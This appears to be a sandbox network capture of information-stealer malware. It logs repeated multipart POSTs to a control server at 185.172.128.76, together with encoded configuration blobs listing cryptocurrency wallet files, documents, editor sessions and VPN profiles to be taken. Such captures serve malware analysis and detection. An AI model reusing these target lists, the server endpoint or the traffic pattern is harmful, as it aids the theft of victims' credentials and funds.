Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11bHRpRG9nZVx8bXVsdGlkb2dlLndhbGxldHwwfEpheHggRGVza3RvcCAob2xkKXwxfFxqYXh4XExvY2FsI
Apr 26, 2024 10:27:17.391829967 CEST	466	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFBFHIEBKJKFHIEBFBAE Host: 185.172.128.76 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 36 64 30 66 31 34 65 62 64 61 63 36 30 32 39 38 33 38 66 37 35 33 30 63 31 63 64 65 30 64 30 32 65 65 34 31 34 31 38 63 66 38 61 37 65 36 63 33 62 66 61 63 64 38 36 61 34 35 62 61 31 62 34 39 63 64 37 32 61 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 42 46 48 49 45 42 4b 4a 4b 46 48 49 45 42 46 42 41 45 2d 2d 0d 0a Data Ascii: ------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="token"256d0f14ebdac6029838f7530c1cde0d02ee41418cf8a7e6c3bfacd86a45ba1b49cd72a6------CFBFHIEBKJKFHIEBFBAEContent-Disposition: form-data; name="message"files------CFBFHIEBKJKFHIEBFBAE--
Apr 26, 2024 10:27:17.740876913 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 2052 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 52 45 39 44 55 33 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 48 77 31 66 44 46 38 4d 58 78 53 52 55 4e 38 4a 56 4a 46 51 30 56 4f 56 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 55 6b 56 44 66 43 56 53 52 55 4e 46 54 6c 51 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 48 77 71 4c 6e 68 74 62 48 77 78 4e 58 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 47 4a 68 59 32 74 31 63 46 78 38 4b 69 34 71 66 44 45 31 66 44 46 38 4d 58 78 54 56 55 4a 4d 53 55 31 46 66 43 56 42 55 46 42 45 51 56 52 42 4a 56 78 54 64 57 4a 73 61 57 31 6c 49 46 52 6c 65 48 51 67 4d 31 78 4d 62 32 4e 68 62 46 78 54 5a 58 4e 7a 61 57 39 75 4c 6e 4e 31 59 6d 78 70 62 57 56 66 63 32 56 7a 63 32 6c 76 62 6c 78 38 4b 69 35 7a 64 57 4a 73 61 57 31 6c 58 79 70 38 4d 54 56 38 4d 58 77 78 66 46 5a 51 54 6c 39 44 61 58 4e 6a 62 31 5a 51 54 6e 77 6c 55 46 4a 50 52 31 4a 42 54 55 5a 4a 54 45 56 54 4a 56 78 63 4c 69 35 63 58 46 42 79 62 32 64 79 59 57 31 45 59 58 52 68 58 46 78 44 61 58 4e 6a 62 31 78 44 61 58 4e 6a 62 79 42 42 62 6e 6c 44 62 32 35 75 5a 57 4e 30 49 46 4e 6c 59 33 56 79 5a 53 42 4e 62 32 4a 70 62 47 6c 30 65 53 42 44 62 47 6c 6c 62 6e 52 63 55 48 4a 76 5a 6d 6c 73 5a 56 78 38 4b 69 35 34 62 57 78 38 4d 54 41 77 66 44 46 38 4d 48 78 57 55 45 35 66 52 6d 39 79 64 47 6c 75 5a 58 52 38 4a 56 42 53 54 30 64 53 51 55 31 47 53 Data Ascii: REVTS3wlREVTS1RPUCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8REVTS3wlREVTS1RPUCVcfCp3YWxsZXQqLnBuZywqd2FsbGV0Ki5wZGYsKmJhY2t1cCoucG5nLCpiYWNrdXAqLnBkZiwqcmVjb3ZlcioucG5nLCpyZWNvdmVyKi5wZGYsKm1ldGFtYXNrKi4qLCpVVEMtLSouKnwxNTAwfDF8MXxET0NTfCVET0NVTUVOVFMlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8RE9DU3wlRE9DVU1FTlRTJVx8Ki50eHQsKi5kb2N4LCoueGxzeHw1fDF8MXxSRUN8JVJFQ0VOVCVcfCoudHh0LCouZG9jeCwqLnhsc3h8NXwxfDF8UkVDfCVSRUNFTlQlXHwqd2FsbGV0Ki5wbmcsKndhbGxldCoucGRmLCpiYWNrdXAqLnBuZywqYmFja3VwKi5wZGYsKnJlY292ZXIqLnBuZywqcmVjb3ZlcioucGRmLCptZXRhbWFzayouKiwqVVRDLS0qLip8MTUwMHwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXHwqLnhtbHwxNXwxfDF8Tk9URVBBRHwlQVBQREFUQSVcTm90ZXBhZCsrXGJhY2t1cFx8Ki4qfDE1fDF8MXxTVUJMSU1FfCVBUFBEQVRBJVxTdWJsaW1lIFRleHQgM1xMb2NhbFxTZXNzaW9uLnN1YmxpbWVfc2Vzc2lvblx8Ki5zdWJsaW1lXyp8MTV8MXwxfFZQTl9DaXNjb1ZQTnwlUFJPR1JBTUZJTEVTJVxcLi5cXFByb2dyYW1EYXRhXFxDaXNjb1xDaXNjbyBBbnlDb25uZWN0IFNlY3VyZSBNb2JpbGl0eSBDbGllbnRcUHJvZmlsZVx8Ki54bWx8MTAwfDF8MHxWUE5fRm9ydGluZXR8JVBST0dSQU1GS
Apr 26, 2024 10:27:17.770684004 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIJDHCAKKFCBGCBAAEC Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:18.147803068 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:18.154850006 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFHDAEHDAKECGCAKFCFI Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:18.532161951 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:18.542140961 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKECBFCGIEGCBGCAECGC Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:18.919666052 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:18.930797100 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEH Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:19.310280085 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:19.330096960 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFCFIEHCFIECBGCBFHIJ Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:19.703305960 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:19.708208084 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHDAKFIJJKKEBGDBAAK Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:20.083894968 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:20.094978094 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGH Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:20.480706930 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:20.486706972 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFI Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:20.857338905 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:20.871280909 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHI Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:21.240386963 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:21.279136896 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDG Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:21.655092955 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:21.687107086 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFIDGCFHIEHJJJJECAK Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:22.059786081 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:22.064882994 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAKFBGCBFHIJKECGIIJ Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:22.439683914 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:22.463033915 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCGHDHIDHCBGCBGCAEB Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:22.860435963 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:22.867492914 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHI Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:23.248755932 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:23.276510954 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDG Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:23.651566982 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:23.790393114 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEGCBAAFHDHDHJKEGCFC Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:24.192492962 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:24.424083948 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIECFIJDAAKEBGCGHIE Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:24.798851013 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:24.820673943 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECBGCGCGIEGCBFHIIEB Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:25.220999956 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:25.242746115 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFI Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:25.615995884 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:25.626281977 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:26.006748915 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:26.017265081 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBKJEGCBKKJECBGCGDBA Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:26.398087025 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:26.403804064 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:26.791630030 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:26.799603939 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBG Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:27.175528049 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:27.181960106 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKJECBAAAFHIIEBFCBKF Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:27.553560972 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:27.576992989 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFCFHDHIIIECBGCAKFI Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:27.958960056 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:28.008747101 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FIDGHIIECGHDHJKFCAEG Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:28.383052111 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:28.552146912 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIECFIJDAAKEBGCGHIE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:28.927905083 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:29.005845070 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDAEBKJDHDAFIECBAKKJ Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:29.385097980 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:30.844738007 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECBGCGCGIEGCBFHIIEB Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:31.217508078 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:31.282438040 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDG Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:31.660799026 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:31.818507910 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECBGCGCGIEGCBFHIIEB Host: 185.172.128.76 Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:32.192179918 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:32.219082117 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:32.600078106 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:32.730766058 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKE Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:33.105078936 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:33.115466118 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJ Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 10:27:33.508013010 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 08:27:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 10:27:33.513219118 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIEHDAFHDHCBFIDGCFID Host: 185.172.128.76 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
